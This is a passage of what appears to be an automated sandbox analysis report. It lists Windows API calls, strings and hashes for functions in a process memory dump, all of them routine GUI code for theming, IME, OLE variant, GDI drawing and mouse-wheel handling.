GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 02D3B85E
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 02D3B870
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 02D3B882
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 02D3B894
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 02D3B8A6
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 02D3B8B8
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 02D3B8CA
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 02D3B8DC
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 02D3B8EE
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 02D3B900
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 02D3B912
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 02D3B924
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 02D3B936
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 02D3B948
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 02D3B95A
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 02D3B96C
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 02D3B97E
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 02D3B990
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 02D3B9A2
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 02D3B9B4
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 02D3B9C6
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 02D3B9D8
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 02D3B9EA
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 02D3B9FC
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 02D3BA0E
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 02D3BA20
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 02D3BA32
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 02D3BA44
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 02D3BA56
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 02D3BA68
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 02D3BA7A
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 02D3BA8C
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 02D3BA9E
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 02D3BAB0
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 02D3BAC2

Strings

uxtheme.dll, xrefs: 02D3B769
GetThemeColor, xrefs: 02D3B88C
GetThemeFont, xrefs: 02D3B90A
GetThemeBackgroundRegion, xrefs: 02D3B820
GetThemeBackgroundContentRect, xrefs: 02D3B7C6, 02D3B7D8
DrawThemeParentBackground, xrefs: 02D3BAA8
GetThemeFilename, xrefs: 02D3B976
GetThemeTextExtent, xrefs: 02D3B7FC
EnableThemeDialogTexture, xrefs: 02D3BA3C
GetThemeEnumValue, xrefs: 02D3B8E6
GetThemeInt, xrefs: 02D3B8D4
SetThemeAppProperties, xrefs: 02D3BA72
GetThemeBool, xrefs: 02D3B8C2
GetThemeSysInt, xrefs: 02D3B9F4
GetThemeSysColorBrush, xrefs: 02D3B99A
GetThemeMargins, xrefs: 02D3B92E
DrawThemeIcon, xrefs: 02D3B856
HitTestThemeBackground, xrefs: 02D3B832
GetThemePosition, xrefs: 02D3B8F8
GetThemeSysFont, xrefs: 02D3B9D0
GetThemeAppProperties, xrefs: 02D3BA60
SetWindowTheme, xrefs: 02D3B964
GetThemeRect, xrefs: 02D3B91C
GetThemeSysColor, xrefs: 02D3B988
IsThemePartDefined, xrefs: 02D3B868
DrawThemeText, xrefs: 02D3B7B4
GetThemeSysString, xrefs: 02D3B9E2
GetThemeSysBool, xrefs: 02D3B9AC
GetWindowTheme, xrefs: 02D3BA2A
IsAppThemed, xrefs: 02D3BA18
DrawThemeBackground, xrefs: 02D3B7A2
IsThemeBackgroundPartiallyTransparent, xrefs: 02D3B87A
IsThemeActive, xrefs: 02D3BA06
DrawThemeEdge, xrefs: 02D3B844
GetThemeSysSize, xrefs: 02D3B9BE
EnableTheming, xrefs: 02D3BABA
GetCurrentThemeName, xrefs: 02D3BA84
GetThemePartSize, xrefs: 02D3B7EA
OpenThemeData, xrefs: 02D3B77E
GetThemeDocumentationProperty, xrefs: 02D3BA96
GetThemeTextMetrics, xrefs: 02D3B80E
CloseThemeData, xrefs: 02D3B790
IsThemeDialogTextureEnabled, xrefs: 02D3BA4E
GetThemePropertyOrigin, xrefs: 02D3B952
GetThemeMetric, xrefs: 02D3B89E
GetThemeIntList, xrefs: 02D3B940
GetThemeString, xrefs: 02D3B8B0

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 3c7870216fda19c497f2dc8b51e2bcd954e3ef33cf5cea6bff7e49cdbb8ea99f
Instruction ID: 27efe07e4670fce53e4d12ecac40f4c6608af8956e555da5b879df9d6597fb3c
Opcode Fuzzy Hash: 3c7870216fda19c497f2dc8b51e2bcd954e3ef33cf5cea6bff7e49cdbb8ea99f
Instruction Fuzzy Hash: DFA167B0A80750AFFB01EFB4F985D6537AAEB167087400A6AB415CFB04EB75DC148FA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D56FD4 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 02D56FED
GetModuleHandleA.KERNEL32(USER32,00000000,02D5713A,?,00008000), ref: 02D57011
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 02D5701E
LoadLibraryA.KERNEL32(imm32.dll,00000000,02D5713A,?,00008000), ref: 02D5703A
GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 02D5705C
GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02D57071
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02D57086
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 02D5709B
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02D570B0
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02D570C5
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 02D570DA
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 02D570EF
GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 02D57104
GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 02D57119
SetErrorMode.KERNEL32(?,02D57141,00008000), ref: 02D57134

Strings

ImmIsIME, xrefs: 02D570F9
WINNLSEnableIME, xrefs: 02D57018
ImmGetCompositionStringA, xrefs: 02D570E4
ImmGetConversionStatus, xrefs: 02D5707B
ImmGetContext, xrefs: 02D57051
imm32.dll, xrefs: 02D57035
ImmSetCompositionWindow, xrefs: 02D570BA
ImmSetConversionStatus, xrefs: 02D57090
ImmNotifyIME, xrefs: 02D5710E
ImmSetCompositionFontA, xrefs: 02D570CF
ImmReleaseContext, xrefs: 02D57066
ImmSetOpenStatus, xrefs: 02D570A5
USER32, xrefs: 02D5700C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 67aa64719e8faf6313ee8312f568172215a689718b2077c3389cdfbaaa406934
Instruction ID: 4eac89b3bbbff143ac58ddcd2fb29647f155e75ff77c421e39f823b8e312bcea
Opcode Fuzzy Hash: 67aa64719e8faf6313ee8312f568172215a689718b2077c3389cdfbaaa406934
Instruction Fuzzy Hash: 38311E71E80310AEFB04AFB4F945D65B7AEE744704F109919F90687B44E7B99C18CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1E610 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02D1E619

Part of subcall function 02D1E5E4: GetProcAddress.KERNEL32(00000000), ref: 02D1E5FD

Strings

VarMul, xrefs: 02D1E695
oleaut32.dll, xrefs: 02D1E614
VarCyFromStr, xrefs: 02D1E79D
VarAdd, xrefs: 02D1E669
VarOr, xrefs: 02D1E703
VarCmp, xrefs: 02D1E72F
VarDiv, xrefs: 02D1E6AB
VarBstrFromCy, xrefs: 02D1E7C9
VarAnd, xrefs: 02D1E6ED
VarBoolFromStr, xrefs: 02D1E7B3
VarBstrFromDate, xrefs: 02D1E7DF
VarNot, xrefs: 02D1E653
VariantChangeTypeEx, xrefs: 02D1E627
VarBstrFromBool, xrefs: 02D1E7F5
VarSub, xrefs: 02D1E67F
VarXor, xrefs: 02D1E719
VarNeg, xrefs: 02D1E63D
VarI4FromStr, xrefs: 02D1E745
VarDateFromStr, xrefs: 02D1E787
VarR8FromStr, xrefs: 02D1E771
VarIdiv, xrefs: 02D1E6C1
VarR4FromStr, xrefs: 02D1E75B
VarMod, xrefs: 02D1E6D7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 150a95b1f4e156b41df5d10a2398726b28298426e7a31a57726b9e1f6d99cf49
Instruction ID: 079a793c63759e4bd1d57bea0ada8c154475f8ccea8422de070e0b861adcbc78
Opcode Fuzzy Hash: 150a95b1f4e156b41df5d10a2398726b28298426e7a31a57726b9e1f6d99cf49
Instruction Fuzzy Hash: 65414D61A852057BB209AF6D740082BBBDBE7C57107A4851BFC04CBF44EE30ED91DA7A

Uniqueness

Uniqueness Score: -1.00%

Function 02D336A4 Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 02D336E7
SelectObject.GDI32(?,?), ref: 02D336FC
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,02D3376C,?,?), ref: 02D33740
SelectObject.GDI32(?,?), ref: 02D3375A
DeleteObject.GDI32(?), ref: 02D33766
CreateCompatibleDC.GDI32(00000000), ref: 02D3377A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 02D3379B
SelectObject.GDI32(?,?), ref: 02D337B0
SelectPalette.GDI32(?,61080E3A,00000000), ref: 02D337C4
SelectPalette.GDI32(?,?,00000000), ref: 02D337D6
SelectPalette.GDI32(?,00000000,000000FF), ref: 02D337EB
SelectPalette.GDI32(?,61080E3A,000000FF), ref: 02D33801
RealizePalette.GDI32(?), ref: 02D3380D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 02D3382F
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 02D33851
SetTextColor.GDI32(?,00000000), ref: 02D33859
SetBkColor.GDI32(?,00FFFFFF), ref: 02D33867
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 02D33893
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 02D338B8
SetTextColor.GDI32(?,?), ref: 02D338C2
SetBkColor.GDI32(?,?), ref: 02D338CC
SelectObject.GDI32(?,00000000), ref: 02D338DF
DeleteObject.GDI32(?), ref: 02D338E8
SelectPalette.GDI32(?,00000000,00000000), ref: 02D3390A
DeleteDC.GDI32(?), ref: 02D33913

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: b6bb2070a4f66c28971cb66321acee81c4e5723ac5eeacc0715ac17f1e7e0034
Instruction ID: 03729018a4a68e7c522184922edf8eaa016a14aaf0204821ae97becb12457a47
Opcode Fuzzy Hash: b6bb2070a4f66c28971cb66321acee81c4e5723ac5eeacc0715ac17f1e7e0034
Instruction Fuzzy Hash: 61818CB2A00249BFDB51EBA9D981EAFBBFDEB08710F114554B618E7640D635ED008BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D35638 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 02D3565B
GetDC.USER32(00000000), ref: 02D35689
CreateCompatibleDC.GDI32(?), ref: 02D3569A
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 02D356B5
SelectObject.GDI32(?,00000000), ref: 02D356CF
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 02D356F1
CreateCompatibleDC.GDI32(?), ref: 02D356FF
SelectObject.GDI32(?), ref: 02D35747
SelectPalette.GDI32(?,?,00000000), ref: 02D3575A
RealizePalette.GDI32(?), ref: 02D35763
SelectPalette.GDI32(?,?,00000000), ref: 02D3576F
RealizePalette.GDI32(?), ref: 02D35778
SetBkColor.GDI32(?), ref: 02D35782
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02D357A6
SetBkColor.GDI32(?,00000000), ref: 02D357B0
SelectObject.GDI32(?,00000000), ref: 02D357C3
DeleteObject.GDI32 ref: 02D357CF
DeleteDC.GDI32(?), ref: 02D357E5
SelectObject.GDI32(?,00000000), ref: 02D35800
DeleteDC.GDI32(00000000), ref: 02D3581C
ReleaseDC.USER32(00000000,00000000), ref: 02D3582D

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: 006318e0ac2d4c3572d37301f7cc8bf8d1212a100d0b6bcd67906347961e7e19
Instruction ID: cdcabd8476bbf213a7ae35a86a28f8a17660a0a11f29645bdbc3cb69ae91f70b
Opcode Fuzzy Hash: 006318e0ac2d4c3572d37301f7cc8bf8d1212a100d0b6bcd67906347961e7e19
Instruction Fuzzy Hash: 2C51F5B6E00248BBEB11EBE9EC45FAEB7BDEB08704F544465B614E7780D6749D40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D363C8 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D36636
CreateCompatibleDC.GDI32(00000001), ref: 02D3669B
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 02D366B0
SelectObject.GDI32(?,00000000), ref: 02D366BA
SelectPalette.GDI32(?,?,00000000), ref: 02D366EA
RealizePalette.GDI32(?), ref: 02D366F6
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 02D3671A
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,02D36773,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 02D36728
SelectPalette.GDI32(?,00000000,000000FF), ref: 02D3675A
SelectObject.GDI32(?,?), ref: 02D36767
DeleteObject.GDI32(00000000), ref: 02D3676D

Strings

(, xrefs: 02D36581
BM, xrefs: 02D364EC

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 26013638cd3e093ee660eb0cde0b2fc2ebccb3265510c0a16b1caeb3725b98a7
Instruction ID: 04001d52155b9c427d4a9ab2ec056f7a3fd5db26ccbb28147ef57739f107b709
Opcode Fuzzy Hash: 26013638cd3e093ee660eb0cde0b2fc2ebccb3265510c0a16b1caeb3725b98a7
Instruction Fuzzy Hash: F4D12AB1A00258AFDF15DFA8D884AAEBBFAEF48304F148465E904AB755D734DC44CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D52D34 Relevance: 25.8, APIs: 17, Instructions: 258COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 02D52D68
GetClientRect.USER32(00000000,?), ref: 02D52D8B
GetWindowRect.USER32(00000000,?), ref: 02D52D9D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02D52DB3
OffsetRect.USER32(?,?,?), ref: 02D52DC8
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,02D52FE7), ref: 02D52DE1
InflateRect.USER32(?,00000000,00000000), ref: 02D52DFF
GetWindowLongA.USER32(00000000,000000F0), ref: 02D52E19
DrawEdge.USER32(?,?,?,00000008), ref: 02D52F18
IntersectClipRect.GDI32(?,?,?,?,?), ref: 02D52F31
OffsetRect.USER32(?,?,?), ref: 02D52F5B
GetRgnBox.GDI32(?,?), ref: 02D52F6A
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02D52F80
IntersectRect.USER32(?,?,?), ref: 02D52F91
OffsetRect.USER32(?,?,?), ref: 02D52FA6
FillRect.USER32(?,?,00000000), ref: 02D52FC2
ReleaseDC.USER32(00000000,?), ref: 02D52FE1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-0
Opcode ID: dd8bed19f0538d8de6d0fd3bcdfe1950923380f62c39aebdcc001deff1e95234
Instruction ID: 889b98ea1a46f405ed2e6fec1db509890e4b6e0ea5ac4e581689c91a44a12574
Opcode Fuzzy Hash: dd8bed19f0538d8de6d0fd3bcdfe1950923380f62c39aebdcc001deff1e95234
Instruction Fuzzy Hash: 56A1D871E00218AFDF01DBA8D895FEEB7BAEF09314F1440A5E915EB251C7B5AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D35B48 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D36140: GetDC.USER32(00000000), ref: 02D36196
Part of subcall function 02D36140: GetDeviceCaps.GDI32(00000000,0000000C), ref: 02D361AB
Part of subcall function 02D36140: GetDeviceCaps.GDI32(00000000,0000000E), ref: 02D361B5
Part of subcall function 02D36140: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,02D34D03,00000000,02D34D8F), ref: 02D361D9
Part of subcall function 02D36140: ReleaseDC.USER32(00000000,00000000), ref: 02D361E4

SelectPalette.GDI32(?,?,000000FF), ref: 02D35B8B
RealizePalette.GDI32(?), ref: 02D35B9A
GetDeviceCaps.GDI32(?,0000000C), ref: 02D35BAC
GetDeviceCaps.GDI32(?,0000000E), ref: 02D35BBB
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 02D35BEE
SetStretchBltMode.GDI32(?,00000004), ref: 02D35BFC
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 02D35C14
SetStretchBltMode.GDI32(00000000,00000003), ref: 02D35C31
CreateCompatibleDC.GDI32(00000000), ref: 02D35C92
SelectObject.GDI32(?,?), ref: 02D35CA7
SelectObject.GDI32(?,00000000), ref: 02D35D06
DeleteDC.GDI32(00000000), ref: 02D35D15

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: d1723fafd9400074d15b9496724b8656285a87d0f2e8627e7fac5e825cb29db0
Instruction ID: 434e8c6fbbc51a45cb9420d0f64b7413505ae1a46c8f80d2619e7067a321a322
Opcode Fuzzy Hash: d1723fafd9400074d15b9496724b8656285a87d0f2e8627e7fac5e825cb29db0
Instruction Fuzzy Hash: 787115B5A04205AFDB51EFA8E985F5ABBF9EB0D300F5485A4F508EB751D634ED00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D33504 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 02D3351B
CreateCompatibleDC.GDI32(00000000), ref: 02D33525
GetObjectA.GDI32(?,00000018,?), ref: 02D33545
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 02D3355C
GetDC.USER32(00000000), ref: 02D33568
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D33595
ReleaseDC.USER32(00000000,00000000), ref: 02D335BB
SelectObject.GDI32(?,?), ref: 02D335D6
SelectObject.GDI32(?,00000000), ref: 02D335E5
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 02D33611
SelectObject.GDI32(?,00000000), ref: 02D3361F
SelectObject.GDI32(?,00000000), ref: 02D3362D
DeleteDC.GDI32(?), ref: 02D33643
DeleteDC.GDI32(?), ref: 02D3364C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: 946afc2ea57cda56218aa4faf7a38933bab6f205a4663f2418e2ef045e9d7e87
Instruction ID: 3369d57977fe0b5973eb8aa4169108641ed436bf6e0cfe6fc86ef7d3fdef89b5
Opcode Fuzzy Hash: 946afc2ea57cda56218aa4faf7a38933bab6f205a4663f2418e2ef045e9d7e87
Instruction Fuzzy Hash: DB41D772E44249BFEB51EBE8E941FAEB7BDEB08700F014464B604E7780D674AD008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1744C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 02D17464
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 02D17470
RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 02D1747F
RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 02D1748B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02D174A3
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 02D174C7

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 02D1747A
MSWHEEL_ROLLMSG, xrefs: 02D1746B
Magellan MSWHEEL, xrefs: 02D1745A
MSH_SCROLL_LINES_MSG, xrefs: 02D17486
MouseZ, xrefs: 02D1745F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: b0d1f087eee48ef5c0b8481f3c9d1b1c113b6f1c847f54e18f1e60871950e3e1
Instruction ID: b33261ce9592012bcd844d567c90c94b702ed3c43a70c2faefd0626be2f6d432
